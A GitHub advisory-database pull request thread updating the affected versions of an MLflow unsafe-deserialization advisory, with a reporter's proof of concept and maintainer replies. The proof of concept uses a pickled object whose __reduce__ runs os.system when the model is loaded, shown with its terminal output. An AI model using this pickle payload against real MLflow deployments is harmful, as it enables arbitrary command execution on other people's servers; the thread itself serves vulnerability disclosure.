search

github / advisory-database

Security vulnerability database inclusive of CVEs and GitHub originated security advisories from the world of open source software.
Creative Commons Attribution 4.0 International
1.72k stars 321 forks source link

[GHSA-ghv6-9r9j-wh4j] MLFlow unsafe deserialization #4546

Closed litios closed 3 months ago

litios commented 3 months ago

Updates

Comments Versions above 2.13.1 are affected, tested on 2.14.1.

$ python3 exploit.py                                                
Successfully registered model 'PyfuncPickleTest'.
Created version '1' of model 'PyfuncPickleTest'.
$ rm -rf /tmp/pwned                                       
$ python3 server.py            
$ ls /tmp/pwned                    
/tmp/pwned
$ cat exploit.py server.py   
import mlflow

class PmdarimaWrapper(mlflow.pyfunc.PythonModel):
 def __init__(self):
     import os

     class RunCommand:
         def __reduce__(self):
             return (os.system, ('touch /tmp/pwned',))

     self.command = RunCommand()

with mlflow.start_run():
 wrapper = PmdarimaWrapper()
 mlflow.pyfunc.log_model(
      artifact_path="model",
      python_model=wrapper,
      registered_model_name="PyfuncPickleTest"
)

import mlflow

logged_model = "models:/PyfuncPickleTest/1"
loaded_model = mlflow.pyfunc.load_model(logged_model, dst_path='/tmp/pyfunc_model')

$  pip3 freeze | grep mlflow
mlflow==2.14.1
shelbyc commented 3 months ago

👋 Hi @litios, normally we don't have a lower bound with no upper bound on an advisory unless the advisory is about a malicious package. However, I'm accepting the contribution with 2.14.1 as the most recent affected version and you'll still get credit on the advisory for alerting us to the fact that 2.14.1 is vulnerable.

advisory-database[bot] commented 3 months ago

Hi @litios! Thank you so much for contributing to the GitHub Advisory Database. This database is free, open, and accessible to all, and it's people like you who make it great. Thanks for choosing to help others. We hope you send in more contributions in the future!

litios commented 3 months ago

Hi @shelbyc, thanks! That makes sense :)

I would like to point out that this advisory relates to several others that all follow pickle deserialization attacks, tracked in this issue

I warned the upstream developers that most certainly the rest of the advisories need an update too due to the quick release cycle of the project. Let me know if there is anything else I can help with.